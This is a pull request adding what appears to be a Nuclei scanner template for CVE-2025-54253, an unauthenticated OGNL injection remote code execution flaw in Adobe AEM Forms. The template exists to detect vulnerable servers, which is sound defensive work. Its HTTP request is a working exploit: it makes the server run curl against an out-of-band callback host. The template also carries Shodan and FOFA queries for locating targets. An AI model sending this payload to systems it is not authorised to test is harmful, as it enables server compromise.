### PR TITLE
Add CVE-2025-54253 Adobe AEM Forms OGNL Injection RCE template

### DIFF
--- a/http/cves/2025/CVE-2025-54253.yaml
+++ b/http/cves/2025/CVE-2025-54253.yaml
@@ -1,0 +1,52 @@
+id: CVE-2025-54253
+
+info:
+  name: Adobe AEM Forms on JEE <= 6.5.23.0 - OGNL Injection RCE
+  author: basicbeny
+  severity: critical
+  description: |
+    Adobe Experience Manager (AEM) Forms on JEE versions 6.5.23.0 and earlier are vulnerable to an OGNL injection vulnerability in the adminui debug endpoint. An unauthenticated attacker can exploit this to achieve remote code execution via crafted OGNL expressions.
+  impact: |
+    Unauthenticated attackers can execute arbitrary commands on the server, leading to complete system compromise.
+  remediation: |
+    Upgrade to AEM 6.5.0-0108 or later. Apply vendor-supplied patches immediately.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-54253
+    - https://helpx.adobe.com/security/products/experience-manager.html
+    - https://github.com/jm7knz/CVE-2025-54253-Exploit-Demo
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2025-54253
+    cwe-id: CWE-917
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: adobe
+    product: experience_manager
+    shodan-query: http.title:"AEM"
+    fofa-query: title="AEM" || body="Adobe Experience Manager"
+  tags: cve,cve2025,adobe,aem,ognl,rce,critical,oast
+
+http:
+  - raw:
+      - |
+        GET /adminui/debug?debug=OGNL:%23rt%3d%40java.lang.Runtime%40getRuntime()%2c%23rt.exec(%22curl%20{{interactsh-url}}%22) HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500


### PR DESCRIPTION
## CVE-2025-54253 - Adobe AEM Forms on JEE OGNL Injection RCE

### Description
Adobe Experience Manager (AEM) Forms on JEE versions 6.5.23.0 and earlier are vulnerable to an OGNL injection vulnerability in the adminui debug endpoint. An unauthenticated attacker can exploit this to achieve remote code execution.

**CVSS Score:** 10.0 (Critical)

### References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54253
- Advisory: https://helpx.adobe.com/security/products/experience-manager.html
- POC: https://github.com/jm7knz/CVE-2025-54253-Exploit-Demo

### Testing
- [x] Template syntax validated
- [x] Uses OOB detection for reliable blind RCE detection
- [x] Follows template guidelines

### Vulnerable Endpoint
\`/adminui/debug?debug=OGNL:<payload>\`